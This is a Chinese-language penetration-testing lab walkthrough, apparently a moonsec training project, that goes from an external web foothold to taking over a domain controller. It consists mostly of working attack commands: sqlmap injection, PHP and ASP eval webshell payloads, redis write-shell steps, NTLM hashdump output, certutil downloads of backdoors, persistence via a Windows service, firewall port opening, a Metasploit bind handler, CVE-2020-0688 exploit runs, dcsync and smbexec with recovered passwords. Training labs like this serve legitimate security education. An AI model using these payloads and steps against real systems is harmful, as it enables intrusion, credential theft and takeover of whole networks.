|
|
原文链接:【项目十一】从外网打点到内网域实战cncat
从外网打点到内网域实战cncat
 
moonsec
1. 概述 1
2. 靶场搭建 2
3. 外网打点 5
3.1. SQLMAP注入得到账号和密码 5
3.2. 修改配置文件拿webshell 6
3.3. 提权宝塔系统 6
3.4. frp反向代理突破登录 9
4. 内网渗透 10
4.1. 主机信息收集 11
4.2. 横向渗透 11
4.3. 跨网段扫描 12
4.4. hydra爆破redis 12
4.5. redis windows写shell 12
4.6. answrod连接shell 13
4.7. 信息收集redis 服务器信息 14
4.8. PrintSpoofer提权server2012 15
4.9. 下载metasploist正向后门收集信息 15
4.10. 设置服务方式启动后门 15
4.11. 设置windwos防火墙开放8899端口 15
4.12. metasploit正向连接后门 16
4.13. outlook查看邮件 18
5. 跨网段内网渗透 18
5.1. CVE-2020-0688 攻击exchange 20
5.2. 获取dc下的root 21
5.3. 通过smbexec登录域控 22
1概述
暗月实战项目十一是从外网打点到内网再到域控,是三层网络,目标是反向代理到内网访问,通过这个WEB点的信息获取源码,再到审计突破,再到内网。到了内网通过横向移动发现更多主机,通过信息整理得到工作组边界设备的权限,再通过exchange漏洞获取核心区域访问权限,再拿下域控权限。
主要技术应用:
基础的php代码审计、win系统的宝塔系统提权、cs或者msf实战渗透环境(vps一台)、shellcode免杀过火绒、内网漫游、三层网络、redis windows 写shell
windwos防火墙配置(主要是会开端口和端口转发)、代理隧道应用,exchange漏洞命令执行,打域控技巧。
2靶场搭建
12server-bt和12server-redis是nat模式。
外网准备一台vps系统可以是win也可以是linux要装有frp服务
在12server-bt配置frp
[common]
server_addr= 你的vpsIP
server_port= 7788
token=moonsec9999
[web]
type= tcp
local_ip= 127.0.0.1
local_port= 80
remote_port= 80
绑定hosts
C:\Windows\System32\drivers\etc\hosts
你的vps www.cocat.cc
3外网打点
3.1 SQLMAP注入得到账号和密码
- POST/kss_inc/payapi_return2.php HTTP/1.1
- Host:www.cocat.cc
- User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101Firefox/88.0
- Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding:gzip, deflate
- Connection:close
- Cookie:ZDEDebuggerPresent=php,phtml,php3; loginimg=A1IIHQlPVwU%3D;loginimg_ver=1c6e1ea86bf5d4fa16f40d540fc3de9e
- Upgrade-Insecure-Requests:1
- Cache-Control:max-age=0
- Content-Type:application/x-www-form-urlencoded
- Content-Length:94
- v_oid=K60722174137712560Dh4iW1&v_pstatus=20&v_amount=1&v_moneytype=1&remark1=1&v_md5str=121212
- sqlmap-r sql.txt --dbms mysql -v 1 -p v_oid --dump -C "username,password"-D www_cocat_cc -T kss_tb_manager
破解得moon@123
3.2 修改配置文件拿webshell
moo');eval($_POST[cmd]);//
3.3 提权宝塔系统
禁用函数
passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,putenv,exec
查看配置文件获取密码
宝塔的登录密码C:/BtSoft/panel/data/default.pl jSKyFFdj
宝塔的登录端口C:/BtSoft/panel/data/port.pl8888
宝塔的登录网址路径C:/BtSoft/panel/data/admin_path.pl/e1VOsmtO
C:/BtSoft/panel/data/default.db
sqlite数据库打开即可
账号gOXZQjWA密码jSKyFFdj登录http://localhost:8888/e1VOsmtO
扫描端口
nmap -sT -A 154.194.2.139
只开放了22和80端口
查看本地开放端口
访问8888端口
<?phpecho file_get_contents('http://localhost:8888/e1VOsmtO/')?>
能访问登录页面但是登录不了。
3.4 frp反向代理突破登录
当前站点是反向代理出去的,所以可以考虑能不能修改配置文件。
- [8080]
- type= tcp
- local_ip= 127.0.0.1
- local_port= 8888
- remote_port= 8888
可以看到文件是能修改,所以当管理重新执行的时候,就能通过8888端口访问宝塔的系统的8888端口。
登录宝塔系统
这个后门还要过火绒的。随便找了以前那些资源生成了一个后门。然后在宝塔任务执行。
4内网渗透
4.1主机信息收集
- hashdump
- Administrator:500:aad3b435b51404eeaad3b435b51404ee:de935c6087ec367d3ef786915a4edcce:::
- Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- mysql:1002:aad3b435b51404eeaad3b435b51404ee:291376866817cf2ccfe198308e5f925b:::
- www:1001:aad3b435b51404eeaad3b435b51404ee:894f353e870620b186a9a46ce56ac8f1:::
- loadmimikatz
- loadkiwi
- msv
- IP 192.168.59.133
run post/windows/gather/arp_scanner rhosts=192.168.59.0/24
4.3 跨网段扫描
在session执行绑定静态路由
- run autoroute -s 192.168.59.0/24
- background
- use auxiliary/server/socks4a
- run
修改配置文件vi/etc/proxychains.conf
添加socks4 127.0.0.1 1080
代理nmap扫描
proxychains nmap -sT -Pn 192.168.59.4 -p80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389
4.4 hydra爆破redis
proxychainshydra -P /home/kali/cncat/top100_cn.txt redis://192.168.59.4 -t 1 -ossh.txt -v
4.5 redis windows写shell
- proxychains redis-cli -h 192.168.59.4
- auth123456789qq
- config set dir C:/inetpub/wwwroot
- setxxx "\n\n\n<%eval request("cmd")%>\n\n\n"
- config set dbfilename shell.asp
- save
- quit
访问shell
4.6 answrod连接shell
修改proxychanis.conf连接
4.7 信息收集redis服务器信息
发现存在两个段
当前权限也是很低
4.8 PrintSpoofer提权server2012
把PrintSpoofer上传到C:\ProgramData\
C:\ProgramData\moonsec.exe-i -c "whoami"
4.9 下载metasploist正向后门收集信息
因为reids主机是出不了网的所以要将后门放在宝塔上的80端口,同样也要过火绒。
certutil -urlcache -split -f http://192.168.59.133/8899.exe 8899.exe
4.10 设置服务方式启动后门
注意双引号转义
- moonsec.exe -i -c "sc create "server power" binpath="C:\ProgramData\8899.exe""
- moonsec.exe -i -c "sc description "server power""description""
- moonsec.exe -i -c "sc config "server power" start= auto"
启动后门moonsec.exe -i -c "net start \"server power\""
4.11 设置windwos防火墙开放8899端口
因为有防火墙拦截先添加一个8899端口
netshfirewall add portopening tcp 8899 msf
4.12 metasploit正向连接后门
- use exploit/multi/handler
- setp ayload windows/meterpreter/bind_tcp
- setR HOST 192.168.59.4
- setl port 8899
- exploit
启动后门
moonsec.exe -i -c "net start \"server power\""
这里有一个bug连上之后个几分钟就自动退出了。所以连接后马上迁移进程防止失去连接。
扫描10段的主机发现存在201和209
4.13 outlook查看邮件
导出outlook文件C:\Users\Administrator\Documents\Outlook文件
从outlook获取信息moonsec的密码是QQqq5201314
5跨网段内网渗透
添加路由
- run autoroute -s 10.10.10.0/24
- proxychains nmap -sT 10.10.10.209 -p80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389
访问443端口是一个exchange
域控应该是cncat\moonsecQQqq5201314
登录成功。
查看所有用户。
5.1 CVE-2020-0688 攻击exchange
下载后门文件到exchange
CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncat\moonsec -p QQqq5201314 -c "cmd/c certutil -urlcache -split -f http://10.10.10.202/4444.exec:/4444.exe"
- CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncat\moonsec -p QQqq5201314 -c "cmd/c netsh firewall add portopening tcp 8899 msf"
- CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncat\moonsec -p QQqq5201314 -c "cmd/c c:/4444.exe"
5.2 获取dc下的root
type \\10.10.10.201\c$\users\administrator\root.txt
dcsync administrator 获取hash
知道了密码就可以通过代理对域控进行命令执行了。这里有空再说了。
5.3 通过smbexec登录域控
proxychains python3 smbexec.py cncat/administrator WEasd123@10.10.10.201
|
|
发表于 2021-7-20 09:46:37